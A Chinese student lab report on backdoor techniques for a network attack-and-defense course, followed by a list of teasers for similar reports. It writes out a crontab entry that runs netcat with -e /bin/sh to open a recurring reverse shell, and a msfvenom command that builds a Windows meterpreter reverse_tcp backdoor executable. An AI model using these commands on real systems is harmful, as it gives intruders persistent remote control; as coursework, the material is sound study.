关键词:
一、实践目标与内容
1.学习内容
- 使用nc实现win,mac,Linux间的后门连接
- meterpreter的应用
- MSF POST 模块的应用
2.学习目标
- 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的安全意识 。
3.概念
- 后门就是不经过正常认证流程而访问系统的通道。
- netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
- socat是ncat的增强版,它使用的格式是socat [options]
- 其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
二、实践步骤:常用的后门工具的应用
1.Mac获得Linux Shell
1.1查看Mac和linux的ip地址
1.4mac 下获得linux shell,运行指令
2.Linux获得macShell
2.3Linux下看到mac的命令提示
4.使用netct获取主机操作Shell,cron启动
4.1先在mac系统下,监听4324端口
nc -l -p 4324
4.2在Linux环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。
4.3用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器
4.4在最后一行添加44 * * * * /bin/netcat 192.168.15.131 4312 -e /bin/sh,意思是在每个小时的第44分钟反向连接
Mac主机的4306端口,因为当时的时间是17:53,所以设置成44,这样,过一分钟就能看到效果了
4.5获取失败,。。。。。。是由于Mac主机的问题?
5.使用socat获取主机操作Shell, 任务计划启动
6.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
6.1在Linux环境下生成后门程序20154324_backdoor.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.130 LPORT=4324 -f exe > 20154324_backdoor.exe
6.2通过nc指令将生成的后门程序传送到MAC主机上
6.3在Linux上使用++msfconsole++指令进入msf控制台,使用监听模块,并设置payload以及反弹回连的IP和端口:
6.4在设置完成后,在Linux环境执行监听
6.5在MAC环境打开后门程序20154324_backdoor.exe,此时可以看到在Linux环境下已经获得了MAC主机的连接,并且得到了远程控制的shell
由于人力不可抗因素,实验被迫中止,谢谢老师
四、心得体会
在这次实践中,我们学习了后门的基本原理及它的运行过程,但是因为电脑本身是Mac os系统,所以存在许多windows的问题无法在Mac上应用,查阅了网上的解决方案也并没有得到解决,但是见识到了后门的厉害,所以一定要认真做实验,学好网络攻防。
20145317彭垚《网络对抗》exp2后门原理与实践
20145317彭垚《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式?在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中;例举你知道的后门如何启动起来(win及linux)的方式... 查看详情
20155218《网络对抗》exp2后门原理与实践(代码片段)
20155218《网络对抗》Exp2后门原理与实践常用后门工具实践1.Windows获得LinuxShell:在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5218端口,在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5218端口,Windows下成功... 查看详情
20155227《网络对抗》exp2后门原理与实践(代码片段)
20155227《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?在非官方网站下载软件时,后门很可能被捆绑在软件中。攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使... 查看详情
20145331魏澍琛《网络对抗》exp2后门原理与实践
20145331魏澍琛《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类的,你一激动一点进去后门就进入你的系统了。(... 查看详情
20155202张旭《网络对抗》exp2后门原理与实践(代码片段)
20155202张旭《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式?捆绑在软件中注入在可执行文件里注入在office文件的宏里面例举你知道的后门如何启动起来(win及linux)的方式?更改... 查看详情
20155204王昊《网络对抗技术》exp2后门原理与实践(代码片段)
20155204王昊《网络对抗技术》EXP2后门原理与实践一、实验内容准备工作(试用ncat、socat)1.使用netcat获取主机操作Shell,cron启动。明确目标:要利用crontab命令从Windows获得linux的shell。在Windows下监听自定端口。用man命令查询crontab... 查看详情
2019-2020-2网络对抗技术20174326旦增列错exp2后门原理与实践(代码片段)
2019-2020-2网络对抗技术20174326旦增列错Exp2后门原理与实践目录一、实验介绍二、实验准备三、实验过程任务一:使用netcat实现windows,linux之间的后门连接任务二:使用socat获取主机操作Shell,任务计划启动任务三:MFSmeterpreter生... 查看详情
2017-2018-2《网络对抗技术》20155322第五周exp2后门原理与实践(代码片段)
#2017-2018-2《网络对抗技术》20155322第五周Exp2后门原理与实践[博客目录]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-使用nc实现win,mac,Linux间的后门连接2.2-meterpreter的应用2.3-MSFPOST模块的应用2.4-注入Shellcode并执行3-... 查看详情
20154324刘康权《网络对抗》exp2后门原理与实践(代码片段)
一、实践目标与内容1.学习内容使用nc实现win,mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用2.学习目标学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的... 查看详情
2019-2020-220175303柴轩达《网络对抗技术》exp2后门原理与实践(代码片段)
目录2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1.基础知识总结2.实验内容任务一任务二任务三任务四任务五3.问题与解决4.基础问题回答5.实验总结与体会2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1... 查看详情
网络对抗技术2017-2018-220152515exp2后门原理与实践(代码片段)
1.实验内容(1)使用netcat获取主机操作Shell,cron启动(0.5分)(2)使用socat获取主机操作Shell,任务计划启动(0.5分)(3)使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)(4)使用MSFmeterpreter(... 查看详情
2018-2019-2网络对抗技术20165236exp2后门原理与实践
2018-2019-2网络对抗技术20165236Exp2后门原理与实践 一、实验内容(3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell,任务计划启动(0.5分) (3)使用MSFmeterpreter(或其他软件)生成可... 查看详情
2019-2020-220175305张天钰《网络对抗技术》exp2后门原理与实践
2019-2020-220175305张天钰《网络对抗技术》Exp2后门原理与实践知识点概括后门:不经过正常认证流程而访问系统的通道。后门类型:编译器留后门操作系统留后门应用程序中留后门潜伏于操作系统中或伪装为特定应用的专用后门程... 查看详情
2018-2019-220165217《网络对抗技术》exp2后门原理与实践
2018-2019-220165217《网络对抗技术》Exp2后门原理与实践实验内容使用netcat获取主机操作Shell,cron启动使用socat获取主机操作Shell,任务计划启动使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机... 查看详情
2018-2019-2网络对抗技术20165318exp2后门原理与实践(代码片段)
2018-2019-2网络对抗技术20165318Exp2后门原理与实践后门的基本概念及实验内容常用后门工具netcatWin获得LinuxShellLinux获得WinShellMeterpreter实验内容任务一:使用netcat获取主机操作Shell,cron启动任务二:使用socat获取主机操作Shell,任务计... 查看详情
2019-2020-2网络对抗技术20175311胡济栋exp2后门原理与实践(代码片段)
2019-2020-2网络对抗技术20175311胡济栋Exp2后门原理与实践一、实验介绍1.后门原理概念后门就是不通过正常认证流程而非法访问操作系统的通道,一般编译器、操作系统、应用程序中都可能留有后门。2.后门操作流程获取常用后门程... 查看详情
2019-2020-220174322童硕《网络对抗技术》exp2后门原理与实践(代码片段)
2019-2020-220174322童硕《网络对抗技术》Exp2后门原理与实践 一、实验内容及预备知识1.实验内容2.基础问题回答 二、常用后门工具实践 任务一:Windows获得LinuxShell 任务二:Linux获得WindowsShell 任务三:使用nc传输数... 查看详情
2019-2020-220175301李锦然《网络对抗技术》exp2后门原理与实践(代码片段)
2019-2020-220175301李锦然《网络对抗技术》Exp2后门原理与实践目录1.实践目标(1)使用netcat获取主机操作Shell,cron启动(0.5分)(2)使用socat获取主机操作Shell,任务计划启动(0.5分)(3)使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat... 查看详情